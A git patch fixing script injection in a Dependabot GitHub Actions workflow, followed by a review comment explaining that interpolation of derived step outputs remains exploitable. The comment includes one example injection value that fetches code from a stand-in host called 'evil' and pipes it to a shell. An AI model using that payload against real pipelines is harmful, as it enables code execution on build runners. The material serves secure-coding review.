From adf5d1b3bb26dc1c1684856ea80d41c555784c22 Mon Sep 17 00:00:00 2001
From: Diogo Teles Sant'Anna
Date: Thu, 15 Aug 2024 10:48:50 -0300
Subject: [PATCH] ci: fix github workflow vulnerable to script injection (#21304)

Signed-off-by: Diogo Teles Sant'Anna
---
 .github/workflows/dependabot-update-all.yml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/dependabot-update-all.yml b/.github/workflows/dependabot-update-all.yml
index f68935443670..01e1ecc4eb4a 100644
--- a/.github/workflows/dependabot-update-all.yml
+++ b/.github/workflows/dependabot-update-all.yml
@@ -4,6 +4,9 @@ on: pull_request
 permissions:
   pull-requests: write
 
+env:
+  PR_TITLE: ${{ github.event.pull_request.title }}
+
 jobs:
   update-all:
     runs-on: ubuntu-latest
@@ -25,8 +28,8 @@ jobs:
           # Extract the dependency name from the PR title
           # Example: "build(deps): Bump github.com/cosmos/cosmos-sdk from 0.46.0 to 0.47.0"
           # Extracts "github.com/cosmos/cosmos-sdk" and "0.47.0"
-          echo "name=$(echo "${{ github.event.pull_request.title }}" | cut -d ' ' -f 3)" >> $GITHUB_OUTPUT
-          echo "version=$(echo "${{ github.event.pull_request.title }}" | cut -d ' ' -f 7)" >> $GITHUB_OUTPUT
+          echo "name=$(echo "$PR_TITLE" | cut -d ' ' -f 3)" >> $GITHUB_OUTPUT
+          echo "version=$(echo "$PR_TITLE" | cut -d ' ' -f 7)" >> $GITHUB_OUTPUT
       - name: Update all Go modules
         run: |
           ./scripts/go-update-dep-all.sh ${{ format('{0}@v{1}', steps.deps.outputs.name, steps.deps.outputs.version) }}
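Review bot: The injection is only half closed, because the last context line of the second hunk still expands `${{ format('{0}@v{1}', steps.deps.outputs.name, steps.deps.outputs.version) }}` directly into a `run:` script, and those two outputs are the third and seventh space-delimited fields of the same attacker-controlled PR title — a field such as `x;curl${IFS}evil|sh` contains no space, survives `cut`, and is pasted verbatim into the shell. Pass the value through the environment the same way this commit does for the title: `env:` / `  DEP: ${{ format('{0}@v{1}', steps.deps.outputs.name, steps.deps.outputs.version) }}` on the "Update all Go modules" step, with the script line becoming `./scripts/go-update-dep-all.sh "$DEP"`. Since the value is still handed to a script as an argument, the `deps` step should also validate the two fields against a strict allowlist (a module-path pattern for `name`, a semver-like pattern for `version`) and `exit 1` on mismatch, rather than trusting the title shape the comment describes; whether `go-update-dep-all.sh` itself re-interpolates its argument cannot be seen here and is worth checking. The `deps` step's `id:`/`run:` header lies above this hunk, and `>> $GITHUB_OUTPUT` would be more robust quoted as `"$GITHUB_OUTPUT"`.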